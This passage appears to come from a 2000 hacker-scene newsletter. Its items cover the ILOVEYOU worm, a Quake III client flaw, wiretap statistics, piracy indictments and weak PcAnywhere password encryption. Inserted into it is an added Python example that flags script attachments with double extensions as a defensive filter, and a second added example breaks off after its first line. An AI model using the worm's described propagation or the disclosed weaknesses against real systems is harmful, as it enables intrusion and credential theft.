The virus, which appeared in Hong Kong late Thursday afternoon, seemed to
particularly hit, among other businesses, public relations firms and
investment banks. Dow Jones and the Asian Wall Street Journal offices in
Asia were among its victims.
In Hong Kong, Nomura International Ltd. is receiving the e-mail virus, an
analyst said. The virus has created a lot of damage in Nomura's London
office, he said. "It just multiplies through the system and eradicates
whole address books," the analyst said.
Simon Flint, currency strategist at Bank of America in Singapore, said he
has received e-mail messages warning him of the virus but hasn't received
the actual virus
@HWA
153.0 [HNN] Quake III Flaw Leaves Users Vulnerable
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by Code Kid
A security hole in Quake III could leave users vulnerable to internet
attack while they play the game. The hole could allow a malicious
server operator to overwrite any file on a client system. Id Software
was notified of the issue by Internet Security Systems, Inc. who held
off on announcing the hole until Id Software could issue a patch.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2561554,00.html
Quake III flaw could frag your computer
Apply the patch now. Otherwise, a Trojan server could be shooting up your system while you play.
By Rob Lemos, ZDNet News May 3, 2000 5:34 PM PT
Game developer Id Software Inc. announced on Wednesday that its flagship
first-person shooter has a security flaw that could leave Quake III
players' computers open to attack while they play. "The basic nature
of the exploit is that malicious server operators could overwrite any file
on a client system," wrote Robert Duffy, a programmer at Id Software, in
his .plan file on Wednesday.
The flaw was found last week by network security firm Internet Security
Systems Inc. and could allow an attacker running a Quake III server to
read and write to any player's computer connecting to that server. Internet
Security Systems waited until Id Software could issue a patch before
sending out an alert to users and the press.
"This vulnerability is important to network administrators who may be
unaware that users are accessing potentially malicious Quake3Arena servers
outside their network," wrote Internet Security Systems in the alert.
Id Software fixed the flaw in its latest patch release, Version 1.17,
released on Wednesday.
To force users to move over to the secured Quake III client, Id Software
has made Version 1.17 of the game incompatible with earlier -- and
insecure -- versions.
@HWA
154.0 [HNN] Phone Taps on the Rise
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by Evil Wench and root66
Federal and State law enforcement agencies ordered 20% more wiretaps
last year on cell phones, pagers, fax machines, and email. The total
number of wiretaps ordered last year was 1,350 of which only 30% were
the traditional 'bug' hidden in a wall or clamped onto a phone line.
The rest were done digitally at the phone station or by eavesdropping
in electronically.
USA Today
US Courts
http://www.usatoday.com/life/cyber/tech/cth831.htm
http://www.uscourts.gov/Press_Releases/press_050100.html
06/07/00- Updated 07:51 PM ET
Technology boosts government wiretaps Fax machines, cell phones, pagers
and e-mail targeted
By Richard Willing, USA TODAY
WASHINGTON - Wiretaps ordered by federal and state authorities on cell
phones, pagers, fax machines and e-mail increased by nearly 20% last year,
pushing the total number of government wiretaps to a record 1,350.
Traditional wiretaps, such as microphones hidden in walls and "bugs"
planted on telephone lines, account for about one-third of all
surveillance devices, according to an annual wiretap survey released
Tuesday by the Administrative Office of the U.S. Courts.
Many of the taps were done by devices that pluck calls from the air or
eavesdrop at cellular phone switching stations.
Nearly three-quarters of the taps were ordered in narcotics
investigations, the report said.
The overall increase was fueled by improved surveillance technology and by
the continued aggressive use of taps by the Clinton administration
Department of Justice.
In 1999, the Justice Department got court permission to carry out 601
wiretaps, up from the 340 authorized in 1992, the year before Clinton took
office.
"Clinton supported wiretapping when he was governor of Arkansas, and
there's been a noticeable push since he became president," said David
Banisar, senior fellow of the Electronic Privacy Information Center, a
watchdog group in Washington.
"At the same time, you've got the explosion in cell phones happening,"
Banisar said. "Everyone is using them, including the people the police
want to intercept."
Justice Department spokeswoman Chris Watney said wiretaps were used in
fewer than 1% of the 50,000 criminal cases brought by the department last
year. "That shows you how selective we are in deciding when wiretaps are
necessary and appropriate," she said.
Under a 1968 federal law and separate laws in 42 states, police may obtain
permission to tap only by convincing a judge that the device would produce
evidence of a crime that could not be obtained any other way. No state or
federal request was turned down last year; three have been rejected since
1989.
Among the report's other findings:
Wiretaps sought by state and local authorities declined by 2% last year,
the first such decrease since 1995.
The overall increase in wiretaps produced more arrests in 1999 but a lower
conviction rate, about 15%.
Five states - New York, California, New Jersey, Pennsylvania and Illinois
- accounted for 81% of all state-ordered wiretaps approved last year.
Fourteen of the 42 states that authorize wiretaps ordered no taps.
Federal agents sought authority for seven e-mail taps last year, two more
than in 1998.
"Roving" taps, a recently authorized federal technique aimed at
individuals rather than phone or pager numbers, increased from 12 in 1998
to 23 last year.
The tendency to rely on wiretaps varied among prosecutors. Taps were used
extensively, for example, in federal drug investigations in central
California and southern Florida. New York City's Special Narcotics Bureau
got permission for 135 taps, more than any state other than New York.
New technology helped simplify the process of tapping cell phones.
Increasingly, cell phone tappers listen in at central switching stations
as calls are relayed to other cellular or hard-wired phones. Police also
use "trigger fish," devices that can pluck cell calls out of the air but
must be used near the caller.
-=-
NEWS RELEASE
Administrative Office of the U.S. Courts
May 1, 2000 Contact: Karen Redmond
Surveillance of Drug Offense Operations Drives 1999 Growth in
Applications for Wiretaps
The number of applications for wiretap orders requested in 1999 rose 2
percent to 1,350, up from 1,331 in 1998, according to the 1999 Wiretap
Report, A Report of the Director of the Administrative Office of the
United States Courts on Applications for Orders Authorizing or Approving
the Interception of Wire, Oral, or Electronic Communications. Federal or
state judges authorized all applications that were requested. In 1999,
violation of drug laws remained the major offense investigated through
wiretaps, with racketeering as the second largest category. The most
common location for the placement of wiretaps was in a single family
dwelling. In 1999, a total of 4,372 persons were reported arrested based
on interceptions of wire, oral, or electronic communications. The wiretap
report is submitted annually to Congress by the Administrative Office of
the U.S. Courts.
During 1999, 28 jurisdictions reported using wire, oral or electronic
surveillance as an investigative tool. The federal government, the
District of Columbia, the Virgin Islands and 42 states currently have laws
authorizing courts to issue orders permitting such surveillance. The
number of applications approved by federal courts in 1999 increased 6
percent, while approvals by state courts fell 2 percent below the 1998
levels. (See attached Table 1.)
Wiretap applications in New York (343 applications), California (76), New
Jersey (71), Pennsylvania (69), and Illinois (50) accounted for 81 percent
of all authorizations approved by state judges. Most state laws limit the
period of surveillance under an original order to 30 days, although
extensions may be granted. Among state wiretaps, the longest was a 510-day
intercept used in a racketeering investigation in New York County, New
York. The longest federal intercept occurred in the Western District of
Texas, where a 289-day wiretap was used in a narcotics investigation.
A total of 978 intercept applications, or 72 percent of all applications
for intercepts authorized in 1999, cited drug offenses as the most serious
offense under investigation. Several criminal offenses may be under
investigation, but only the most serious offense is named in an
application. The use of federal intercepts to conduct drug investigations
was most common in the Central District of California (38 applications)
and the Southern District of Florida (34 applications). On the state
level, the New York City Special Narcotics Bureau obtained authorizations
for 135 drug-related intercepts, which accounted for the highest
percentage of all drug-related intercepts reported by state or local
jurisdictions. Racketeering was cited in 139 of the applications, followed
by homicide/assault (62), and gambling (60). (See attached Table 7.)
In 1999, 18 percent of all intercept devices, or 248 wiretaps, were
authorized for single-family dwellings, a category that includes houses,
rowhouses, townhouses, and duplexes. Forty-nine percent of intercept
applications, or 663 applications, specified "other" locations. These may
include electronic wiretaps such as mobile telephones, electronic pagers,
and cellular telephones.
As of December 31, 1999, a total of 4,372 persons had been arrested based
on interceptions reported. Fifteen percent, or 654 persons, were
convicted. Federal wiretaps were responsible for the most arrests (66
percent) and convictions (55 percent). A wiretap in the Western District
of New York resulted in the arrest of 83 persons, the most arrests of any
intercept in 1999. A wiretap in the Southern District of Florida produced
the most convictions of any wiretap when an intercept used in a drug
investigation resulted in the conviction of 23 of the 26 persons arrested.
Among state intercepts, the intercept producing the most arrests took
place in Middlesex County, New Jersey, where an intercept in a drug
investigation resulted in the arrest of 72 persons.
Each federal and state judge is required to file a written report with the
Director of the Administrative Office of the U.S. Courts on each
application for an order authorizing the interception of a wire, oral, or
electronic communication (18 U.S.C. 2519(1)). No report to the
Administrative Office is required when an order is issued with the consent
of one of the principal parties to the communication.
A summary report on authorized intercepts is attached. The full report can
be found on the Judiciary's website at www.uscourts.gov.
@HWA
155.0 [HNN] Minors Lose Rights In Georgia
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 4th
contributed by n0body
Georgia law now allows parents to record juveniles' telephone and email
communications if they believe the child is involved in criminal
activity or otherwise in danger. (And what about the person who the
child is talking to, do they have any rights?)
APB Online
http://www.apbnews.com/safetycenter/family/2000/05/03/wiretap0503_01.html
Georgia Lets Parents Tap Kids' Phones
Officials Say Safety, Criminal Concerns Outweigh Privacy Issue
May 3, 2000
By Randy Wyles
ATLANTA (APBnews.com) -- Parents and prosecutors in Georgia have a new
weapon in their fight to protect children from crime -- the right to
record juveniles' phone conversations.
Under a new law signed by Gov. Roy Barnes last week, parents can legally
record their children's private phone conversations and e-mails if they
believe the children are in danger or involved in criminal activity.
The legislation stems from a case in the Atlanta suburb of Marietta in
which the district attorney and the parents of a 13-year-old girl said a
former family friend molested the teen. The prosecutor in the case had
tried to introduce audio recordings into court as evidence of allegedly
inappropriate sexual phone conversations between the child and the
accused.
Kyle "Rick" Bishop, 40, was charged with aggravated child molestation and
aggravated sexual battery for the alleged affair with the girl.
"I guarantee if you or anyone else hears the tapes, there will be no doubt
in anyone's mind that he is guilty," said David C. Scott, the girl's
father.
Late-night calls led to visits
The girl was 11 when Bishop, a neighbor, allegedly began fostering a
relationship with her that Scott said he wanted to develop sexually.
Scott said Bishop claims his daughter pursued him. The girl's parents
became suspicious when late-night phone calls led to frequent visits by
the child to Bishop's home to watch television. So the parents began
eavesdropping and recording the phone conversations.
One night four years ago, Scott's wife listened in on a conversation that
shocked her.
"The nature of that conversation was so sexually explicit that my wife
immediately called the police after making my daughter hang up the
telephone," Scott said.
One party must know of tap
Bishop was arrested and charged. As part of his bond agreement, he was not
allowed within a mile of the family, which meant he had to move. The court
even refused to let him return to his home, forcing Bishop to arrange for
friends to move his belongings.
The case was finally placed on the court docket last year. But during a
pretrial hearing, Bishop's defense attorney filed a motion preventing the
tapes from being introduced as evidence, citing a violation of Georgia
privacy laws.
Georgia law permits a person to record phone conversations as long as one
of the parties involved with the call is aware it's being done. Bishop's
attorney contended neither the child nor Bishop knew the calls were being
recorded and that the parents did not have a right to record the
conversations, even though they were made on the Scotts' home phones and
involved their child.
The court ruled against the defense motion, but Bishop took it to the
Court of Appeals, which overturned the ruling in his favor. At the same
time, the Georgia Legislature took up the issue and passed a measure that
allows parents the right to record their children's conversations.
Can law be applied retroactively?
Meanwhile, Cobb County District Attorney Pat Head of Marietta, the
prosecutor in the case, filed a motion to overturn the Court of Appeals'
decision with the Georgia Supreme Court, which has yet to rule.
There is some debate as to whether the new law could actually be applied
retroactively to the very case that sparked the legislation.
"If [the Georgia Supreme Court] does affirm the Court of Appeals, then
we're taking the position that the law that has changed is procedural and
not substantive and that it does not affect any of [Bishop's]
constitutional rights nor any of his statutory rights, but is simply a
matter under which evidence is admitted in court," Head said.
But the district attorney still feels positive about the new law, no
matter how the case is resolved.
"It's a tool by which the parents are going to be given, at least, the
availability of keeping some control of their children and knowing what
their children are involved in," Head said.
As far as the Scotts are concerned, their hopes rest with Head, the
Georgia Supreme Court and the new law.
"I'm saddened that my daughter has had a number of years of her childhood
stolen from her," Scott said. "But it's just not part of my constitution
to want to take a baseball bat to somebody. Seeing this guy go to jail,
that makes me very, very gratified."
Randy Wyles is an APBnews.com correspondent in Atlanta.
@HWA
156.0 [HNN] 'I Love You'
~~~~~~~~~~~~~~~~~~
May 5th
contributed by Everybody
Technical Details
First, as soon as a user opens the worm file (usually by
double-clicking), the malicious code accesses the Microsoft Outlook
address book and sends a copy of itself to every entry. Second, the
worm copies itself into images (.jpg and .jpeg), Visual Basic scripts
(.vbs and .vbe) and Javascript files (.js and .jse), deleting their
previous contents. Music files (.mp3 and .mp2) are hidden, and a file of
the same name that contains the worm's script and has a .vbs file
extension is put in their place. The worm also infects files on networked
and mapped drives and sends itself to people who join a chat room
with an infected member (via mIRC). Finally, the virus will attempt to
contact one of four Web sites in the Philippines that supposedly have
a file called WIN-BUGSFIX.exe prepared for download. Those sites have
since been taken off line by the Internet service provider.
ZD Net
CNN
Reuters
Quick Facts
The virus/worm appears to have originated in the Philippines although
some reports now indicate Europe.
The malicious code spread around the world in approximately six hours.
CERT claims 300,000 infected computers at 250 sites world wide were
reported as of 2pm EST yesterday. This dwarfs Melissa's reach.
There are already at least three variants, including ones called 'joke'
and 'Susitikim'.
Various Links
People who have analyzed the code have said that its organization is
rather sloppy and that it does not indicate good programming skills.
Look for yourself: SANS has posted a copy of the source.
SANS
The four web pages pointed to by the virus/worm have been taken off
line by the ISP hosting them.
ZD Net
The CERT Advisory recommends that network administrators place
filters on "ILOVEYOU" in the email headers. (This will not stop the
variants, though.)
CERT
Changing subject line defeats some filters.
C|Net
'I Love You' clean up expected to dwarf Melissa's $80 million price
tag.
C|Net
FW:Joke replacing ILOVEYOU in trip around the world.
MSNBC
Several anti-virus software vendors have set up 'I Love You'
information centers and they have posted new versions of their virus
definition files.
F-Secure
Symantec
BindView
http://www.zdnet.com/zdnn/stories/news/0,4586,2562483,00.html?chkpt
http://cnn.com/2000/TECH/computing/05/04/iloveyou/index.html
http://dailynews.yahoo.com/h/nm/20000504/ts/tech_virus.html
http://www.sans.org/y2k/050400-1100.htm
http://www.zdnet.com/zdnn/stories/news/0,4586,2562211,00.html
http://www.cert.org/advisories/CA-2000-04.html
http://news.cnet.com/news/0-1003-200-1815107.html?tag
http://news.cnet.com/news/0-1003-200-1814907.html?tag
http://www.msnbc.com/news/403350.asp?bt
http://www.msnbc.com/m/olk2k/
http://www.f-secure.com
http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
http://www.bindview.com/news/2000/0504.html
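Why a subject-line filter misses the variants while an attachment-name check does not, as an added example that is not from HNN, CERT or any vendor named above. The sample messages, sender addresses and attachment names are constructed, and the list of decoy inner extensions is an assumption.

```python
import os
from email import message_from_bytes, policy
from email.message import EmailMessage

# Script-host extensions named in the write-up above.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse"}
# Inner extensions that make a script look like a document, picture or song
# (assumption chosen for this example).
DECOY_EXTS = {".txt", ".doc", ".jpg", ".jpeg", ".mp3", ".mp2"}


def subject_filter(msg, blocked=("ILOVEYOU",)):
    """Header filter of the kind the advisory describes: match on the subject."""
    subject = (msg["Subject"] or "").upper()
    return any(token in subject for token in blocked)


def attachment_verdict(filename):
    """Return 'double-extension', 'script' or None for one attachment name."""
    # Windows ignores trailing dots and spaces, so strip them before checking.
    name = filename.strip().rstrip(". ").lower()
    stem, ext = os.path.splitext(name)
    if ext not in SCRIPT_EXTS:
        return None
    inner = os.path.splitext(stem)[1]
    return "double-extension" if inner in DECOY_EXTS else "script"


def attachment_filter(msg):
    """Collect every attachment whose name ends in a script-host extension."""
    hits = []
    for part in msg.walk():
        filename = part.get_filename()
        verdict = attachment_verdict(filename) if filename else None
        if verdict:
            hits.append((filename, verdict))
    return hits


def build_sample(subject, attachment_name=None):
    """Build a constructed message and round-trip it through wire format."""
    msg = EmailMessage()
    msg["From"] = "colleague@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = subject
    msg.set_content("kindly check the attached file")
    if attachment_name:
        msg.add_attachment(
            b"' constructed placeholder, not worm code\r\n",
            maintype="application",
            subtype="octet-stream",
            filename=attachment_name,
        )
    return message_from_bytes(msg.as_bytes(), policy=policy.default)


# Constructed samples: subjects follow the names reported above, attachment
# names are invented for this example.
SAMPLES = [
    build_sample("ILOVEYOU", "letter.TXT.vbs"),
    build_sample("fwd: Joke", "funny.vbs"),
    build_sample("Susitikim", "kava.jpg.vbs"),
    build_sample("ILOVEYOU"),                       # text-only mail about the worm
    build_sample("Quarterly report", "report.doc"),
]


def evaluate(samples=SAMPLES):
    """Return (subject, caught_by_subject_filter, attachment_hits) per message."""
    return [(m["Subject"], subject_filter(m), attachment_filter(m)) for m in samples]


if __name__ == "__main__":
    for subject, by_subject, by_attachment in evaluate():
        print(f"{subject!r:20} subject-filter={by_subject!s:5} attachments={by_attachment}")
```

The subject filter blocks the harmless text-only message and passes both renamed variants; the attachment check gets all five right.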
@HWA
157.0 [HNN] Microsoft Employee Busted for Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by acopalyse
A Chicago Grand Jury has indicted 17 people, including a former
employee of Microsoft and five employees of Intel for allegedly
infringing the copyright on more than 5,000 computer software
programs. 12 of the 17 were allegedly members of the group known as
'Pirates with Attitudes' (PWA), infiltrated by government agents last
year. PWA's alleged leader, Marlenus (Robin Rothberg), was also
indicted.
[ Yes PWA *did* influence our choice of a name for HWA and *no* we
do not have any official affiliation with the group or any of
its members past or present.. - Ed ]
ABC News
http://abcnews.go.com/sections/tech/DailyNews/Intel000504.html
Suspected Software Thieves Indicted
Authorities Arrest Microsoft, Intel Employees
CHICAGO, May 4 -- Prosecutors today announced the indictment of a
global ring of suspected software thieves and five workers at chip maker
Intel Corp. who allegedly exchanged hardware for access to an array of
pirated software. A federal grand jury in Chicago indicted 17 people,
including a former Microsoft Corp. employee and two Europeans, for
allegedly infringing the copyright on more than 5,000 computer software
programs. Of those indicted, 12 were allegedly members of the group known
as "Pirates with Attitudes" (PWA), a software piracy ring that was
infiltrated by government investigators last year. Their Web site,
identified by prosecutors as "Sentinel" or "WAREZ", was located on a
computer at the University of Sherbrooke in Quebec and accumulated software
that was stripped of its embedded copy protection by members. Programs
available for downloading to those provided access via a secure Internet
protocol address included operating systems, applications such as word
processing and data analysis, games and MP3 music files, prosecutors said.
Four employees of Santa Clara, California-based Intel shipped hardware to
the site in Canada in 1998 to give it more storage capacity. In exchange,
they and other Intel employees were to be given access to the pirated
software, which a fifth employee allegedly arranged. The company was
unaware of the scheme, prosecutors said.
Microsoft Employee Implicated
Another defendant was an employee of Redmond, Washington-based Microsoft
Corp. who allegedly supplied bootleg copies of the software giant's
products for the site. He also allegedly gave access to Microsoft's
internal network to the ringleader of PWA. The alleged ringleader, Robin
Rothberg, 32, also known by the online moniker "Marlenus," of North
Chelmsford, Massachusetts, was charged in February with conspiring to
violate the copyrights on thousands of computer programs. He has been out
of jail on bond but was summoned to appear in Chicago. Among those indicted
were alleged PWA members from Belgium and Sweden. Last year, the Justice
Department said it was launching an initiative to combat piracy and
counterfeiting of intellectual property. "This is the most significant
investigation of copyright infringement involving the use of the Internet
conducted to date by the FBI," said Kathleen McChesney, head of the FBI's
Chicago office. If convicted, the defendants could spend five years in
prison and pay a $250,000 fine, or they could be ordered to pay a fine
totaling twice the gross gain to any defendant or twice the gross loss to
any victim, whichever is greater.
@HWA
158.0 [HNN] Cisco Insider Convicted of Stealing PIX Source
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by acopalyse
A former employee of Cisco Systems has been found guilty by a jury in
Santa Clara County Superior Court of stealing the source code to
Private Internet Exchange (PIX). The source code was estimated to be
worth billions of dollars. (Yes, that is a B.)
San Jose Mercury News
http://www.mercurycenter.com/svtech/news/front/docs/cisco050300.htm
Url fucked off
@HWA
159.0 [HNN] British Plan to Monitor Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by The Hex
The British are building the Government Technical Assistance Centre to
eavesdrop on all information sent over the Internet in Britain. The
system will be centered in the headquarters of MI5, the British secret
service agency. All of Britain's Internet Service Providers will be
connected to the GTAC through dedicated lines (which they will have to
pay for themselves). The government insists that when the system is
finished by the end of this year that absolutely nothing will be
intercepted without a warrant. (Uh huh, sure.)
Wired
http://www.wired.com/news/business/0,1367,36031,00.html
Brits Launch Online Spy Network
Wired News Report 3:00 a.m. May. 2, 2000 PDT
A few weeks back, Russia's secret service agency raised privacy watchdogs'
hackles when it admitted it could intercept and monitor all Russian
Internet traffic.
On Sunday the British government acknowledged that it was building a
system that could do the same thing in Great Britain, ostensibly to help
catch money launderers, terrorists, pedophiles, and other criminals who do
business online.
It also could help usher in an era of Orwellian surveillance, privacy
advocates fear.
"They've taken a lead from the KGB," said Jason Catlett, president of
Junkbusters, an online privacy advocacy group.
The British system, called the Government Technical Assistance Centre,
will have its hub in the headquarters of the MI5, the British secret
service agency. All of Britain's Internet Service Providers will be
connected to the GTAC through dedicated lines (which they will have to pay
for themselves).
After its scheduled completion by the end of the year, the system will
allow British police and secret service agents to intercept every bit of
the country's Internet traffic. That could include email, credit card
transactions, banking data -- any information exchanged between computers
on the Web.
But absolutely nothing will be intercepted without a warrant, the British
government insists.
"There's no way (the security services) are going to be trawling through
everybody's emails," said a government spokeswoman. "Every intercept will
be obtained in the same way it is now: a warrant has to be signed by the
secretary of state." It's no different than tapping phone lines, the
government insisted.
Despite the government's assurances, legal experts warn that the system
could be easily abused.
"It sounds reasonable -- catch terrorists, criminals, and so on -- but it
has the potential to be particularly unreasonable," said Brian Smith, an
international e-commerce and banking attorney with the Washington-based
law firm Mayer Brown & Platt.
"They will know where people are putting their money, how they're
spending, who they're talking to." Security agents might be tempted to
access information without a warrant, or might obtain warrants on dubious
pretexts.
Moreover, Net users and business all over the world could potentially be
affected by the system.
"This is not just a matter for the U.K.," Smith said. "They'll be able to
see everything that goes through the U.K. A multinational company may be
sending confidential information about its business plans through the
U.K., and who knows what might happen? Just look at how the U.S.
government has used employee emails in its case against Microsoft."
The British government's acknowledgment of its planned system is sure to
re-ignite speculation about the existence of Echelon, a supposed
international electronic surveillance network.
Privacy advocates and a number of politicians are convinced that the
system exists, but government officials in Europe and the United States
have repeatedly denied it.
Reuters contributed to this report.
@HWA
160.0 [HNN] MPAA Tries to Ban 2600 Lawyer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by Macki
The MPAA has filed a motion to disqualify the high profile lawyer
retained by 2600 in its fight over DeCSS. The MPAA suit alleges that
Martin Garbus' firm can not represent 2600 due to a conflict of
interest.
2600.com
This legal brief is immense but it is a tour de force for reverse
engineering and fair use rights. Let's hope the court agrees!
Definitely recommended reading for anyone interested in this case.
Cryptome
http://www.2600.com/news/2000/0505.html
http://cryptome.org/mpaa-v-2600-rb.htm
@HWA
161.0 [HNN] Apache.org Defaced
~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
(My story seems to have been ripped since the info/article I sent on
this to them shows through in this text, that's 'ok' I suppose ...
isn't it? - Ed)
contributed by McIntyre
The home of the popular Apache software was defaced last month by a group
of determined individuals. Unlike an ordinary intrusion that uses
scripts or vulnerabilities in the operating system, these hackers
focused solely on configuration errors to change the 'Powered by
Apache' logo to 'Powered by Back Office'. (Yes, this was actually a
hack and not a script kiddie clicking a mouse button.)
Attrition.org - Mirror of Defaced Site
Dataloss.net - How they did it.
http://www.attrition.org/mirror/attrition/2000/05/03/www.apache.org/
http://www.dataloss.net/papers/how.defaced.apache.org.txt
@HWA
162.0 [HNN] Voice Security on the Cheap
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by dark_wyrm
Starium, a company based in Monterey, CA, plans to sell telephone
scrambling devices that connect to the handset of any telephone. The
units would compress, filter, and encrypt voice communications.
Starium claims that there is no NSA backdoor. Retail price for the
unit is expected to be less than $100.
Wired
http://www.wired.com/news/technology/0,1282,21236,00.html
Starium Promises Phone Privacy
by Declan McCullagh 3:00 a.m. Aug. 12, 1999 PDT
MONTEREY, California -- The sleepy coastal town of Monterey,
California, is not the kind of place where vision-fired entrepreneurs
come to change the world. Monterey Bay is better known for sea lions
than silicon, and for Cannery Row -- made famous half a century ago
in John Steinbeck's gritty, eponymous novel.
Today, the third floor of a converted sardine factory on Cannery Row is
home to a startup company developing what could become a new world
standard in privacy protection. By early 2000, Starium Inc. plans to begin
selling sub-US$100 telephone scrambling devices so powerful that even the
US government's most muscular supercomputers can't eavesdrop on wiretapped
conversations.
Such heavily armored privacy is currently available only to government and
corporate customers who pony up about $3,000 for STU-III secure phones
created by the US National Security Agency. By squeezing the same kind of
ultra-strong encryption into a sleek brushed-steel case about twice the
size of a Palm V -- and crafted by the same San Francisco designer --
Starium hopes to bring crypto to the masses.
"Americans by nature don't like people reading over their shoulders," says
Lee Caplin, president and CEO of Starium.
True enough. But whether Americans will pay extra for privacy is open to
question, especially since both people in a conversation need the Starium
"handsets" to chat securely.
And there's another big obstacle: The US government has repeatedly tried
to keep similar products off the market unless they have a backdoor for
surveillance. Its export rules prevent Starium from freely shipping its
products overseas.
Starium's three co-founders -- the company has since grown to eight people
-- claim they're not fazed.
"The technology is out there. Whether they like it or not, it exists,"
says Bernie Sardinha, Starium chief operations officer. "You cannot stop
progress. You cannot stop technology."
Starium at first planned to call its product CallGuard, but abandoned the
name after discovering another company owned the trademark. The firm is
considering VoiceSafe as another potential name.
Customers will use the device by plugging it into their telephone handset
-- a feature allowing it to work with office systems -- and plugging the
handset into the base of the phone.
At the touch of a "secure" button, the modems inside the two Starium units
will form a link that, theoretically, creates an untappable communications
channel. The units digitize, compress, filter, and encrypt voice
communications -- and reverse the process on the other end.
The Starium handset uses a 2,048-bit Diffie-Hellman algorithm for the
initial setup, and a 168-bit triple DES algorithm for voice encoding. The
four-chip unit includes a 75 MHz MIPS processor, an infrared interface, a
smart card port, and possibly serial, USB, and parallel interfaces, the
company says. The final version will operate for over 2 hours on a pair of
AA batteries.
Starium's business plan is nothing if not ambitious. In addition to
selling the portable units, the company wants to add crypto capabilities
to cell phones, faxes, and even corporate networks. Target markets include
the legal, medical, banking, and even political fields.
"I've gotten a call from the George W. Bush people for use in the
campaign," CEO Caplin says.
The company says it's working on deals with major cell phone manufacturers
like Ericsson and Nokia to offer the same voice-scrambling in software.
Newer cell phones have enough memory and a fast enough processor to handle
the encryption. Best of all, a software upgrade could be free.
"You take your phone into a mall or a kiosk and they simply burn in the
new flash ROM," Sardinha says.
The idea for Starium came from longtime cypherpunk and company co-founder
Eric Blossom, who was inspired by the Clinton administration's
now-abandoned Clipper Chip plan to devise a way to talk privately.
"I got interested around the time of Clipper. I was scratching my head
saying, 'This is offensive,'" says Blossom, a former engineer at Hewlett
Packard and Clarity Software.
Blossom created prototype devices and sold them online. But they were
clunky -- about the size of a desktop modem. They were also expensive, and
didn't sell very well.
The company's directors include Robert Kohn, former chief counsel for PGP
and Borland International, and Whitfield Diffie, distinguished engineer at
Sun Microsystems and co-inventor of public key cryptography.
@HWA
163.0 [HNN] Takedown Reviewed
~~~~~~~~~~~~~~~~~~~~~~~
May 5th
contributed by William Knowles
The movie 'Takedown', which details the pursuit and capture of Kevin
Mitnick and is based on the Markoff book of the same name, is starting
to get a little press potentially in anticipation of its US debut. The
movie has already been released in France and has received less than
stellar reviews.
San Francisco Chronicle
http://www.sfgate.com/cgi-bin/article.cgi?file
Url deceased
@HWA
164.0 [HNS] Apr 8:NEW KIND OF SECURITY SCANNER
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Saturday 8 April 2000 on 3:33 AM
ISS is offering an on-line scanner for Web sites which surveys users'
hard drives to detect any potentially dangerous programs, such as
Trojans and viruses, that may have been placed on the machine without
their knowledge.
Link: The Register
http://www.theregister.co.uk/000407-000033.html
Dead url
@HWA
165.0 [HNS] April 8:WAYS TO ATTACK
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Saturday 8 April 2000 on 3:32 AM
Following recent high-profile Web security breaches, Enstar, an
e-security firm, hosted a live demonstration in San Antonio Friday to
show the many ways hackers break into systems.
Link: CRN
http://www.crn.com/dailies/digest/breakingnews.asp?ArticleID
Bad url/server error
@HWA
166.0 [HNS] April 7:STOLEN ACCOUNTS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 6:50 PM
"Malicious hackers" from overseas have been racking up surfing bills
for unsuspecting SingNet customers by using their Internet accounts,
The Straits Times has found out.
Link: The Straits Times
http://www.straitstimes.asia1.com/singapore/sin20_0407.html
Dead url
@HWA
167.0 [HNS] April 7:JAILED FOR SIX MONTHS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 6:48 PM
Po Yiu-ming, 19, who was among the first three hackers to be convicted
since computer crime-related laws were enacted in 1994, was jailed for
six months yesterday.
Link: SCMP
http://www.scmp.com/News/HongKong/Article/FullText_asp_ArticleID-20000406015347330.asp
Dead url
@HWA
168.0 [HNS] April 7: PcANYWHERE WEAK PASSWORD ENCRYPTION
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
by BHZ
Friday 7 April 2000 on 4:27 PM
PcAnywhere 9.0.0 set to its default security value uses a trivial
encryption method so user names and passwords are not sent directly in
clear. Since most users have the encryption methods set to either
"none" or "PcAnyWhere", their passwords are sent with weak encryption.
Link: Bugware
http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid955117228,48342,
PcAnywhere weak password encryption
Posted to BugTraq on 7.4.2000
PcAnywhere 9.0.0 set to its default security value uses a trivial
encryption method so user names and passwords are not sent directly in
clear. Since most users have the encryption methods set to either "none"
or "PcAnyWhere", their passwords are sent with weak encryption.
A major concern lies in the fact that PcAnywhere can authenticate users
based on their NT domain accounts and passwords. When the user logs on, it
is prompted for its NT username and password. They are then "encrypted"
through the PcAnywhere method and decrypted by the host computer for
validation by the NT domain controller. Someone snooping on the traffic
between the two stations will unlock both the PcAnywhere and NT account.
All that without even having to go through the L0phtCrack process.
Version 7.0 is not at risk since no encryption is used at all. Username
and password are sent in clear. I haven't tested version 8 yet.
--- Solution ---
Symantec says that this was not intended to be real
encryption and suggests the use of the Public or Symmetric key option
instead. More info can be found at :
http://service1.symantec.com/SUPPORT/pca.nsf/docid/1999022312571812&src=w
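Why an "encryption" with no secret key protects nothing on the wire, next to a keyed challenge-response, as an added example that is not part of the BugTraq post or of PcAnywhere. The XOR pad is a toy stand-in (the post does not describe the real method), the HMAC exchange is a substitute technique rather than Symantec's public or symmetric key option, and the login string is constructed.

```python
import hashlib
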